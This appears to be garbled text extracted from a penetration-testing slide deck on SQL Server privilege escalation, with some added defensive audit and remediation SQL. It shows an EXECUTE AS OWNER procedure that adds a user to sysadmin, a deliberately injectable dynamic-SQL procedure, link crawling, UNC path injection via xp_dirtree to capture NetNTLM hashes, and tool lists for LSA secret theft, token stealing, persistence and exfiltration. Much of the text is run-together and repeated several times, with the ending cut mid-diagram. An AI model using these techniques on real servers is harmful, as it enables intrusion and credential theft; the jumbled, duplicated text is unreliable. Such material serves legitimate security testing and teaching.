3 Exfiltrate Sensitive Databull All standard methods Copy database TCP ports UDP ports DNS
tunneling ICMP tunneling email HTTP shares links etc (No exfil in PowerUpSQL yet)
3 Grab the first 48 Bytes of the full RID RID = 0x0105000000000005150000009CC30DD479441EDEB31027D000020000 SID = 0x0105000000000005150000009CC30DD479441EDEB31027D0
Escalating Privileges ImpersonationStored Procedure and Trigger Creation Injection Issues
bull EXECUTE AS OWNER can be used to execute a stored procedure as another login
Prosbull Can execute queriescommands in another user contextbull Limit commands and queries bull Donrsquot have to grant IMPERSONATE
Consbull No granular control over the database ownerrsquos
privilegesbull DB_OWNER role can EXECUTE AS OWNER of the DB
which is often a sysadminbull Requires database to be configured as trustworthy for
OS command executionbull Impersonation can be done via SQL injection under
specific conditionsbull Impersonation can be done via command injection
under specific conditions
Escalating Privileges ImpersonationStored Procedure and Trigger Creation Injection Issues
bull EXECUTE AS OWNER can be used to execute a stored procedure as another login
bull DB_OWNER role can impersonate the actual database owner
USE MyAppDbGOCREATE PROCEDURE sp_escalate_meWITH EXECUTE AS OWNERASEXEC sp_addsrvrolemember MyAppUsersysadminGO
Escalating Privileges ImpersonationStored Procedure and Trigger Creation Injection Issues
bull EXECUTE AS OWNER can be used to execute a stored procedure as another login
bull DB_OWNER role can impersonate the actual database owner
USE MyAppDbGOCREATE PROCEDURE sp_escalate_meWITH EXECUTE AS OWNERASEXEC sp_addsrvrolemember MyAppUsersysadminGO
SYSADMIN is often the
OWNER
Escalating Privileges ImpersonationStored Procedure and Trigger Creation Injection Issues
bull Use signed Procedures
o Create stored procedure
o Create a database master key
o Create a certificate
o Create a login from the certificate
o Configure login privileges
o Sign stored procedure with certifiate
o GRANT EXECUTE to User
Prosbull Can execute queriescommands in another user
contextbull Limit commands and queries bull Donrsquot have to grant IMPERSONATEbull Granular control over permissionsbull Database does NOT have to be configured as
trustworthy for OS command execution
Consbull Impersonation can be done via SQL injection
under specific conditionsbull Impersonation can be done via command
injection under specific conditions
Escalating Privileges ImpersonationSQL Injection Example CREATE PROCEDURE sp_sqli2
DbName varchar(max) ASBEGINDeclare query as varchar(max)SET query = lsquoSELECT name FROM mastersysdatabases WHERE name like + DbName+ OR name=tempdb EXECUTE(query)ENDGO
Escalating Privileges ImpersonationSQL Injection Example CREATE PROCEDURE sp_sqli2
DbName varchar(max) ASBEGINDeclare query as varchar(max)SET query = lsquoSELECT name FROM mastersysdatabases WHERE name like + DbName+ OR name=tempdb EXECUTE(query)ENDGO
Escalating Privileges: Shared Service Accounts - Why should I care about shared service accounts?
1. SysAdmins can execute OS commands
2. OS commands run as the SQL Server service account
3. Service accounts have sysadmin privileges by default
4. Companies often use a single domain account to run hundreds of SQL Servers
5. So if you get sysadmin on one server, you have it on all of them
One account to rule them all
[Figure: Leveraging Shared MS SQL Server Service Accounts (animated over four slides). Network diagram with Internet, DMZ and Intranet zones: a Low Value Application (LVA) and a High Value Application (HVA) on ports 80 and 443, their database servers on ports 1433 and 1434, and ADS. Key: HVA = High Value Application, LVA = Low Value Application. Steps: 1. Captain Evil gets in through SQL injection against the LVA; 2. Execute local command via xp_cmdshell; 3. Access to the HVA with the shared domain service account: execute commands and gather data from other database servers via osql.]
Escalating Privileges: Crawling Server Links
Escalating Privileges: Crawling Server Links - What's a database link?
Database links are basically persistent database connections for SQL Servers.
Why should I care?
Short answer = privilege escalation
• Public role can use links to execute queries on remote servers (impersonation)
SELECT * FROM OpenQuery([SQLSERVER2],'SELECT @@Version')
• Stored procedures can be executed (xp_cmdshell)
• Links can be crawled
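As an added example that is not from the presentation, an audit query listing the links on one instance and the identity each link hands to callers (the "link with least privileges" versus "link with the SA account" distinction), followed by one hop of the crawl. The catalog views are SQL Server's own; the link name [SQLSERVER2] is the one on the slide.

```sql
-- Added example, not from the presentation: an inventory of the links on
-- one instance and of the identity each link hands to callers. Catalog
-- views are SQL Server's own; [SQLSERVER2] is the link name from the slide.

-- Every linked server, one row per login mapping.
-- local_principal_id = 0 is the default mapping that applies to ALL local
-- logins, which includes every member of public. A fixed remote_name on that
-- row means anyone who can run OPENQUERY arrives on the remote server as
-- that account, whatever their own privileges are.
SELECT  s.name                        AS linked_server,
        s.data_source,
        s.product,
        s.is_data_access_enabled,         -- required for OPENQUERY
        s.is_rpc_out_enabled,             -- required to EXEC remote procedures
        CASE ll.local_principal_id
             WHEN 0 THEN N'<all logins>'
             ELSE sp.name
        END                           AS local_login,
        ll.uses_self_credential,          -- 1 = caller's own identity is passed
        ll.remote_name,                   -- fixed remote login, if any
        CASE
             WHEN ll.remote_name = N'sa'
                  THEN N'REVIEW: remote sa credential stored on this link'
             WHEN ll.local_principal_id = 0
                  AND ll.uses_self_credential = 0
                  AND ll.remote_name IS NOT NULL
                  THEN N'REVIEW: every login, public included, reaches '
                       + s.name + N' as ' + ll.remote_name
             ELSE N'ok'
        END                           AS finding
FROM sys.servers AS s
JOIN sys.linked_logins AS ll
     ON ll.server_id = s.server_id
LEFT JOIN sys.server_principals AS sp
     ON sp.principal_id = ll.local_principal_id
WHERE s.is_linked = 1
ORDER BY s.name, ll.local_principal_id;

-- One hop of the crawl the slide mentions, using the same OPENQUERY form:
-- the remote server lists its own links, each of which is the next hop.
-- Walking this from each instance maps the path from a low-value database
-- to the link that carries sa, which is the link to fix first.
SELECT *
FROM OPENQUERY([SQLSERVER2],
     'SELECT name, data_source, is_rpc_out_enabled
      FROM sys.servers WHERE is_linked = 1');
```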
[Figure: Leveraging MS SQL Database Links (animated over four slides). Same network diagram: Internet, DMZ and Intranet zones; LVA and HVA on ports 80 and 443; database servers on ports 1433 and 1434; ADS. Key: HVA = High Value Application, LVA = Low Value Application. Steps: 1. Captain Evil gets in through SQL injection against the LVA and reaches its database, DB1; DB1 has a DB link with least privileges to the next server, which in turn has a DB link with the SA account; 2. Execute SQL queries and local commands on database servers via nested linked services.]
Escalating Privileges: Crawling Server Links - Penetration Test Stats
Database links exist (and can be crawled) in about 50% of environments we've seen.
Escalating Privileges: UNC Path Injection
• UNC paths are used for accessing remote file servers, like so: \\192.168.1.4\file
• Almost all procedures that accept a file path in SQL Server support UNC paths
• UNC paths can be used to force the SQL Server service account to authenticate to an attacker
• An attacker can then capture the NetNTLM password hash and crack or relay it
• Relay becomes pretty easy when you know which SQL Servers are using shared accounts
Escalating Privileges: UNC Path Injection
Oh yeah...
By DEFAULT the PUBLIC role can execute (at least) two procedures that accept a file path:
xp_dirtree
xp_fileexist
Escalating Privileges: UNC Path Injection
So in summary...
The PUBLIC role can access the SQL Server service account NetNTLM password hash by default.
Escalating Privileges: UNC Path Injection
But who really has PUBLIC role access?
Oh yeah, a ton of domain users.
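As an added example that is not from the presentation, the checks a defender runs on one instance to confirm what the slides above describe (which service account it runs as, and which file-path procedures public may execute), with the corresponding revoke and a verification step. All views and procedures are SQL Server's own; the login used for verification is a placeholder.

```sql
-- Added example, not from the presentation: checks for what the slides
-- describe on one instance, plus the fix. All views and procedures are
-- SQL Server's own; the real name of the second procedure is xp_fileexist.

-- Which account the SQL Server service runs as (SQL Server 2008 R2 SP1 or
-- later). Collect this value from every instance: the same domain account
-- appearing on many of them is the shared-service-account case, where one
-- captured or relayed NetNTLM hash is good for all of them.
SELECT servicename, service_account, startup_type_desc
FROM sys.dm_server_services;
GO

-- Extended procedures that take a file path and that public may execute.
-- They run in the service process, so a UNC path argument makes the service
-- account authenticate outbound to whatever host the path names.
USE master;
GO
SELECT  o.name             AS procedure_name,
        pr.name            AS grantee,
        dp.state_desc,
        dp.permission_name
FROM sys.database_permissions  AS dp
JOIN sys.all_objects           AS o  ON o.object_id = dp.major_id
JOIN sys.database_principals   AS pr ON pr.principal_id = dp.grantee_principal_id
WHERE dp.class = 1                              -- object-level permission
  AND dp.permission_name = N'EXECUTE'
  AND pr.name = N'public'
  AND o.name IN (N'xp_dirtree', N'xp_fileexist',
                 N'xp_subdirs', N'xp_getfiledetails');
GO

-- Remediation: remove public's EXECUTE on the two procedures the slide names.
-- Members of sysadmin are unaffected (they bypass permission checks), and an
-- application login that genuinely needs one of them can be granted EXECUTE
-- individually. Re-run the query above afterwards: the rows disappear.
REVOKE EXECUTE ON OBJECT::dbo.xp_dirtree   FROM public;
REVOKE EXECUTE ON OBJECT::dbo.xp_fileexist FROM public;
GO

-- Verify from a low-privileged login's point of view (placeholder login;
-- impersonation needs sysadmin or IMPERSONATE on that login). A sysadmin
-- sees every permission, a login covered by the public grant sees EXECUTE,
-- and after the revoke the result set is empty.
EXECUTE AS LOGIN = 'MyAppUser';
SELECT permission_name
FROM sys.fn_my_permissions('dbo.xp_dirtree', 'OBJECT');
REVERT;
```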
Escalating Privileges: DEMO
DEMO: Get-SQLServiceAccountPwHashes
...what? It's self descriptive.
Escalating Privileges: UNC Path Injection
DEMO
Escalating Privileges: OS Admin to SysAdmin
Escalating Privileges: OS Admin to SysAdmin - Two things to know...
1. Different SQL Server versions can be abused in different ways
2. All SQL Server versions provide the service account with sysadmin privileges
Escalating Privileges: OS Admin to SysAdmin
Approach | 2000 2005 2008 2012 2014 2016
LSA Secrets | x x x x x x
Local Administrator | x x
LocalSystem | x x x
Process Migration | x x x x x x
Token Stealing | x x x x x x
Single User Mode | x x x x x
Below are some options for leveraging that knowledge.
Escalating Privileges: OS Admin to SysAdmin - Here are some tool options
Approach | Common Tools
Access as Local Administrator | Management Studio, sqlcmd and other native SQL client tools
Access as LocalSystem | Psexec, accessibility options or a debugger, with native SQL client tools
Recover SQL Server service account password from LSA Secrets | Mimikatz, Metasploit lsadump
Inject shellcode or DLL into the SQL Server service process | Metasploit, Empire, Python, PowerShell, C, C++ (LoadLibrary/CreateRemoteThread and similar functions)
Steal authentication token from SQL Server service process | Metasploit Incognito, Invoke-TokenManipulation
Single User Mode | DBATools
Common Post Exploitation Activities
Post Exploitation Overview: Common Post Exploitation Activities
1. Establish Persistence
• SQL Server Layer: startup procedures, agent jobs, triggers, modified code
• OS Layer: Registry & file auto runs, tasks, services, etc.
2. Identify Sensitive Data
• Target large databases
• Locate transparently encrypted databases
• Search columns based on keywords and sample data
• Use regular expressions and the Luhn formula against data samples
3. Exfiltrate Sensitive Data
• All standard methods: copy database, TCP ports, UDP ports, DNS tunneling, ICMP tunneling, email, HTTP, shares, links, etc. (No exfil in PowerUpSQL yet)
3. Grab the first 48 bytes of the full RID
RID = 0x0105000000000005150000009CC30DD479441EDEB31027D000020000
SID = 0x0105000000000005150000009CC30DD479441EDEB31027D0
Escalating Privileges ImpersonationStored Procedure and Trigger Creation Injection Issues
bull EXECUTE AS OWNER can be used to execute a stored procedure as another login
Prosbull Can execute queriescommands in another user contextbull Limit commands and queries bull Donrsquot have to grant IMPERSONATE
Consbull No granular control over the database ownerrsquos
privilegesbull DB_OWNER role can EXECUTE AS OWNER of the DB
which is often a sysadminbull Requires database to be configured as trustworthy for
OS command executionbull Impersonation can be done via SQL injection under
specific conditionsbull Impersonation can be done via command injection
under specific conditions
Escalating Privileges ImpersonationStored Procedure and Trigger Creation Injection Issues
bull EXECUTE AS OWNER can be used to execute a stored procedure as another login
bull DB_OWNER role can impersonate the actual database owner
USE MyAppDbGOCREATE PROCEDURE sp_escalate_meWITH EXECUTE AS OWNERASEXEC sp_addsrvrolemember MyAppUsersysadminGO
Escalating Privileges ImpersonationStored Procedure and Trigger Creation Injection Issues
bull EXECUTE AS OWNER can be used to execute a stored procedure as another login
bull DB_OWNER role can impersonate the actual database owner
USE MyAppDbGOCREATE PROCEDURE sp_escalate_meWITH EXECUTE AS OWNERASEXEC sp_addsrvrolemember MyAppUsersysadminGO
SYSADMIN is often the
OWNER
Escalating Privileges ImpersonationStored Procedure and Trigger Creation Injection Issues
bull Use signed Procedures
o Create stored procedure
o Create a database master key
o Create a certificate
o Create a login from the certificate
o Configure login privileges
o Sign stored procedure with certifiate
o GRANT EXECUTE to User
Prosbull Can execute queriescommands in another user
contextbull Limit commands and queries bull Donrsquot have to grant IMPERSONATEbull Granular control over permissionsbull Database does NOT have to be configured as
trustworthy for OS command execution
Consbull Impersonation can be done via SQL injection
under specific conditionsbull Impersonation can be done via command
injection under specific conditions
Escalating Privileges ImpersonationSQL Injection Example CREATE PROCEDURE sp_sqli2
DbName varchar(max) ASBEGINDeclare query as varchar(max)SET query = lsquoSELECT name FROM mastersysdatabases WHERE name like + DbName+ OR name=tempdb EXECUTE(query)ENDGO
Escalating Privileges ImpersonationSQL Injection Example CREATE PROCEDURE sp_sqli2
DbName varchar(max) ASBEGINDeclare query as varchar(max)SET query = lsquoSELECT name FROM mastersysdatabases WHERE name like + DbName+ OR name=tempdb EXECUTE(query)ENDGO
Escalating Privileges Shared Service AccountsWhy should I care about shared service accounts
1 SysAdmins can execute OS commands2 OS commands run as the SQL Server service account 3 Service accounts have sysadmin privileges by default4 Companies often use a single domain account to run hundreds of SQL Servers5 So if you get sysadmin on one server you have it on all of them
One account to rule them all
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
LVA
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging Shared MS SQL Server Service Accounts
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
LVA
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging Shared MS SQL Server Service Accounts
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
LVA
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Execute Local Command via xp_cmdshell
2
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging Shared MS SQL Server Service Accounts
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
LVA
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Execute Local Command via xp_cmdshell
2
Access to HVA with shared domain service account
Key
HVA = High Value Application
LVA = Low Value Application
Execute commands and gather data from other
database servers via osql
3
Leveraging Shared MS SQL Server Service Accounts
EscalatingPrivileges
Crawling Server Links
Escalating Privileges Crawling Server LinksWhatrsquos a database link
Database links are basically persistent database connections for SQL Servers
Why should I care
Short answer = privilege escalation
Public role can use links to execute queries on remote servers (impersonation)
SELECT FROM OpenQuery([SQLSERVER2]rsquoSELECT Versionrsquo)
Stored procedures can be executed (xp_cmdshell)
Links can be crawled
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain EvilKey
HVA = High Value Application
LVA = Low Value Application
Leveraging MS SQL Database links
DB1
LVA
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging MS SQL Database links
DB1
LVA
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging MS SQL Database links
DB Link with
Least Privileges
DB1
LVA
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging MS SQL Database links
DB Link with
Least Privileges
DB Link with
SA account
DB1
LVA
Execute SQL queries and local commands on
database servers via nested linked services
2
Escalating Privileges Crawling Server Links
Penetration Test Stats
Database links exist (and can be crawled) in about 50 of environments wersquove seen
UNC paths are used for accessing remote file servers like so 19216814file
Almost all procedures that accept a file path in SQL Server support UNC paths
UNC paths can be used to force the SQL Server service account to authenticate to an attacker
An attacker can then capture the NetNTLM password hash and crack or relay it
Relay becomes pretty easy when you know which SQL Servers are using shared accounts
Escalating Privileges UNC Path Injection
Escalating Privileges UNC Path Injection
Oh yeahhellip
By DEFAULT the PUBLIC role can execute (at least) two procedures that accept a file path
xp_dirtreexp_fileexists
Escalating Privileges UNC Path Injection
So in summaryhellip
The PUBLIC role can access the SQL Server service account NetNTLM
password hash by default
Escalating Privileges UNC Path Injection
But who really hasPUBLIC role access
Oh yeah a ton of domain users
Escalating Privileges DEMO
DEMOGet-SQLServiceAccountPwHashes
hellipwhat Itrsquos self descriptive
Escalating Privileges UNC Path Injection
DEMO
>
EscalatingPrivileges
OS Admin to SysAdmin
Escalating Privileges OS Admin to SysAdminTwo things to knowhellip
1 Different SQL Server versions can be abused in different ways2 All SQL Server versions provide the service account with sysadmin privileges
Escalating Privileges OS Admin to SysAdmin
Approach 2000 2005 2008 2012 2014 2016
LSA Secrets x x x x x x
Local Administrator x x
LocalSystem x x x
Process Migration x x x x x x
Token Stealing x x x x x X
Single User Mode x x x x x
Below are some options for leveraging that knowledge
Escalating Privileges OS Admin to SysAdminHere are some tool options
Approach Common Tools
Access as Local Administrator Management Studio sqlcmd and other native SQL client tools
Access as LocalSystem Psexec accessibility options debugger with native SQL client tools
Recover SQL Server service account password from LSA Secrets
Mimikatz Metasploit lsadump
Inject shellcode or DLL into the SQL Server service process
Metasploit Empire Python Powershell C C++ (LoadLibraryCreateRemoteThread and similar functions)
Steal Authentication Token From SQL Server service process
Metasploit Incognito Invoke-TokenManipulation
Single User Mode DBATools
Common Post Exploitation Activities
Post Exploitation OverviewCommon Post Exploitation Activities
1 Establish Persistencebull SQL Server Layer startup procedures agent jobs triggers modified codebull OS Layer Registry amp file auto runs tasks services etc
2 Identify Sensitive Databull Target large databasesbull Locate transparently encrypted databasesbull Search columns based on keywords and sample databull Use regular expressions and the Luhn formula against data samples
3 Exfiltrate Sensitive Databull All standard methods Copy database TCP ports UDP ports DNS
tunneling ICMP tunneling email HTTP shares links etc (No exfil in PowerUpSQL yet)
3 Grab the first 48 Bytes of the full RID RID = 0x0105000000000005150000009CC30DD479441EDEB31027D000020000 SID = 0x0105000000000005150000009CC30DD479441EDEB31027D0
Escalating Privileges ImpersonationStored Procedure and Trigger Creation Injection Issues
bull EXECUTE AS OWNER can be used to execute a stored procedure as another login
Prosbull Can execute queriescommands in another user contextbull Limit commands and queries bull Donrsquot have to grant IMPERSONATE
Consbull No granular control over the database ownerrsquos
privilegesbull DB_OWNER role can EXECUTE AS OWNER of the DB
which is often a sysadminbull Requires database to be configured as trustworthy for
OS command executionbull Impersonation can be done via SQL injection under
specific conditionsbull Impersonation can be done via command injection
under specific conditions
Escalating Privileges ImpersonationStored Procedure and Trigger Creation Injection Issues
bull EXECUTE AS OWNER can be used to execute a stored procedure as another login
bull DB_OWNER role can impersonate the actual database owner
USE MyAppDbGOCREATE PROCEDURE sp_escalate_meWITH EXECUTE AS OWNERASEXEC sp_addsrvrolemember MyAppUsersysadminGO
Escalating Privileges ImpersonationStored Procedure and Trigger Creation Injection Issues
bull EXECUTE AS OWNER can be used to execute a stored procedure as another login
bull DB_OWNER role can impersonate the actual database owner
USE MyAppDbGOCREATE PROCEDURE sp_escalate_meWITH EXECUTE AS OWNERASEXEC sp_addsrvrolemember MyAppUsersysadminGO
SYSADMIN is often the
OWNER
Escalating Privileges ImpersonationStored Procedure and Trigger Creation Injection Issues
bull Use signed Procedures
o Create stored procedure
o Create a database master key
o Create a certificate
o Create a login from the certificate
o Configure login privileges
o Sign stored procedure with certifiate
o GRANT EXECUTE to User
Prosbull Can execute queriescommands in another user
contextbull Limit commands and queries bull Donrsquot have to grant IMPERSONATEbull Granular control over permissionsbull Database does NOT have to be configured as
trustworthy for OS command execution
Consbull Impersonation can be done via SQL injection
under specific conditionsbull Impersonation can be done via command
injection under specific conditions
Escalating Privileges ImpersonationSQL Injection Example CREATE PROCEDURE sp_sqli2
DbName varchar(max) ASBEGINDeclare query as varchar(max)SET query = lsquoSELECT name FROM mastersysdatabases WHERE name like + DbName+ OR name=tempdb EXECUTE(query)ENDGO
Escalating Privileges ImpersonationSQL Injection Example CREATE PROCEDURE sp_sqli2
DbName varchar(max) ASBEGINDeclare query as varchar(max)SET query = lsquoSELECT name FROM mastersysdatabases WHERE name like + DbName+ OR name=tempdb EXECUTE(query)ENDGO
Escalating Privileges Shared Service AccountsWhy should I care about shared service accounts
1 SysAdmins can execute OS commands2 OS commands run as the SQL Server service account 3 Service accounts have sysadmin privileges by default4 Companies often use a single domain account to run hundreds of SQL Servers5 So if you get sysadmin on one server you have it on all of them
One account to rule them all
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
LVA
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging Shared MS SQL Server Service Accounts
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
LVA
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging Shared MS SQL Server Service Accounts
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
LVA
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Execute Local Command via xp_cmdshell
2
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging Shared MS SQL Server Service Accounts
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
LVA
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Execute Local Command via xp_cmdshell
2
Access to HVA with shared domain service account
Key
HVA = High Value Application
LVA = Low Value Application
Execute commands and gather data from other
database servers via osql
3
Leveraging Shared MS SQL Server Service Accounts
EscalatingPrivileges
Crawling Server Links
Escalating Privileges Crawling Server LinksWhatrsquos a database link
Database links are basically persistent database connections for SQL Servers
Why should I care
Short answer = privilege escalation
Public role can use links to execute queries on remote servers (impersonation)
SELECT FROM OpenQuery([SQLSERVER2]rsquoSELECT Versionrsquo)
Stored procedures can be executed (xp_cmdshell)
Links can be crawled
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain EvilKey
HVA = High Value Application
LVA = Low Value Application
Leveraging MS SQL Database links
DB1
LVA
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging MS SQL Database links
DB1
LVA
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging MS SQL Database links
DB Link with
Least Privileges
DB1
LVA
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging MS SQL Database links
DB Link with
Least Privileges
DB Link with
SA account
DB1
LVA
Execute SQL queries and local commands on
database servers via nested linked services
2
Escalating Privileges Crawling Server Links
Penetration Test Stats
Database links exist (and can be crawled) in about 50 of environments wersquove seen
UNC paths are used for accessing remote file servers like so 19216814file
Almost all procedures that accept a file path in SQL Server support UNC paths
UNC paths can be used to force the SQL Server service account to authenticate to an attacker
An attacker can then capture the NetNTLM password hash and crack or relay it
Relay becomes pretty easy when you know which SQL Servers are using shared accounts
Escalating Privileges UNC Path Injection
Escalating Privileges UNC Path Injection
Oh yeahhellip
By DEFAULT the PUBLIC role can execute (at least) two procedures that accept a file path
xp_dirtreexp_fileexists
Escalating Privileges UNC Path Injection
So in summaryhellip
The PUBLIC role can access the SQL Server service account NetNTLM
password hash by default
Escalating Privileges UNC Path Injection
But who really hasPUBLIC role access
Oh yeah a ton of domain users
Escalating Privileges DEMO
DEMOGet-SQLServiceAccountPwHashes
hellipwhat Itrsquos self descriptive
Escalating Privileges UNC Path Injection
DEMO
>
EscalatingPrivileges
OS Admin to SysAdmin
Escalating Privileges OS Admin to SysAdminTwo things to knowhellip
1 Different SQL Server versions can be abused in different ways2 All SQL Server versions provide the service account with sysadmin privileges
Escalating Privileges OS Admin to SysAdmin
Approach 2000 2005 2008 2012 2014 2016
LSA Secrets x x x x x x
Local Administrator x x
LocalSystem x x x
Process Migration x x x x x x
Token Stealing x x x x x X
Single User Mode x x x x x
Below are some options for leveraging that knowledge
Escalating Privileges OS Admin to SysAdminHere are some tool options
Approach Common Tools
Access as Local Administrator Management Studio sqlcmd and other native SQL client tools
Access as LocalSystem Psexec accessibility options debugger with native SQL client tools
Recover SQL Server service account password from LSA Secrets
Mimikatz Metasploit lsadump
Inject shellcode or DLL into the SQL Server service process
Metasploit Empire Python Powershell C C++ (LoadLibraryCreateRemoteThread and similar functions)
Steal Authentication Token From SQL Server service process
Metasploit Incognito Invoke-TokenManipulation
Single User Mode DBATools
Common Post Exploitation Activities
Post Exploitation OverviewCommon Post Exploitation Activities
1 Establish Persistencebull SQL Server Layer startup procedures agent jobs triggers modified codebull OS Layer Registry amp file auto runs tasks services etc
2 Identify Sensitive Databull Target large databasesbull Locate transparently encrypted databasesbull Search columns based on keywords and sample databull Use regular expressions and the Luhn formula against data samples
3 Exfiltrate Sensitive Databull All standard methods Copy database TCP ports UDP ports DNS
tunneling ICMP tunneling email HTTP shares links etc (No exfil in PowerUpSQL yet)
Escalating Privileges ImpersonationStored Procedure and Trigger Creation Injection Issues
bull EXECUTE AS OWNER can be used to execute a stored procedure as another login
Prosbull Can execute queriescommands in another user contextbull Limit commands and queries bull Donrsquot have to grant IMPERSONATE
Consbull No granular control over the database ownerrsquos
privilegesbull DB_OWNER role can EXECUTE AS OWNER of the DB
which is often a sysadminbull Requires database to be configured as trustworthy for
OS command executionbull Impersonation can be done via SQL injection under
specific conditionsbull Impersonation can be done via command injection
under specific conditions
Escalating Privileges ImpersonationStored Procedure and Trigger Creation Injection Issues
bull EXECUTE AS OWNER can be used to execute a stored procedure as another login
bull DB_OWNER role can impersonate the actual database owner
USE MyAppDbGOCREATE PROCEDURE sp_escalate_meWITH EXECUTE AS OWNERASEXEC sp_addsrvrolemember MyAppUsersysadminGO
Escalating Privileges ImpersonationStored Procedure and Trigger Creation Injection Issues
bull EXECUTE AS OWNER can be used to execute a stored procedure as another login
bull DB_OWNER role can impersonate the actual database owner
USE MyAppDbGOCREATE PROCEDURE sp_escalate_meWITH EXECUTE AS OWNERASEXEC sp_addsrvrolemember MyAppUsersysadminGO
SYSADMIN is often the
OWNER
Escalating Privileges ImpersonationStored Procedure and Trigger Creation Injection Issues
bull Use signed Procedures
o Create stored procedure
o Create a database master key
o Create a certificate
o Create a login from the certificate
o Configure login privileges
o Sign stored procedure with certifiate
o GRANT EXECUTE to User
Prosbull Can execute queriescommands in another user
contextbull Limit commands and queries bull Donrsquot have to grant IMPERSONATEbull Granular control over permissionsbull Database does NOT have to be configured as
trustworthy for OS command execution
Consbull Impersonation can be done via SQL injection
under specific conditionsbull Impersonation can be done via command
injection under specific conditions
Escalating Privileges ImpersonationSQL Injection Example CREATE PROCEDURE sp_sqli2
DbName varchar(max) ASBEGINDeclare query as varchar(max)SET query = lsquoSELECT name FROM mastersysdatabases WHERE name like + DbName+ OR name=tempdb EXECUTE(query)ENDGO
Escalating Privileges ImpersonationSQL Injection Example CREATE PROCEDURE sp_sqli2
DbName varchar(max) ASBEGINDeclare query as varchar(max)SET query = lsquoSELECT name FROM mastersysdatabases WHERE name like + DbName+ OR name=tempdb EXECUTE(query)ENDGO
Escalating Privileges Shared Service AccountsWhy should I care about shared service accounts
1 SysAdmins can execute OS commands2 OS commands run as the SQL Server service account 3 Service accounts have sysadmin privileges by default4 Companies often use a single domain account to run hundreds of SQL Servers5 So if you get sysadmin on one server you have it on all of them
One account to rule them all
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
LVA
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging Shared MS SQL Server Service Accounts
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
LVA
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging Shared MS SQL Server Service Accounts
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
LVA
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Execute Local Command via xp_cmdshell
2
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging Shared MS SQL Server Service Accounts
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
LVA
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Execute Local Command via xp_cmdshell
2
Access to HVA with shared domain service account
Key
HVA = High Value Application
LVA = Low Value Application
Execute commands and gather data from other
database servers via osql
3
Leveraging Shared MS SQL Server Service Accounts
EscalatingPrivileges
Crawling Server Links
Escalating Privileges Crawling Server LinksWhatrsquos a database link
Database links are basically persistent database connections for SQL Servers
Why should I care
Short answer = privilege escalation
Public role can use links to execute queries on remote servers (impersonation)
SELECT FROM OpenQuery([SQLSERVER2]rsquoSELECT Versionrsquo)
Stored procedures can be executed (xp_cmdshell)
Links can be crawled
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain EvilKey
HVA = High Value Application
LVA = Low Value Application
Leveraging MS SQL Database links
DB1
LVA
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
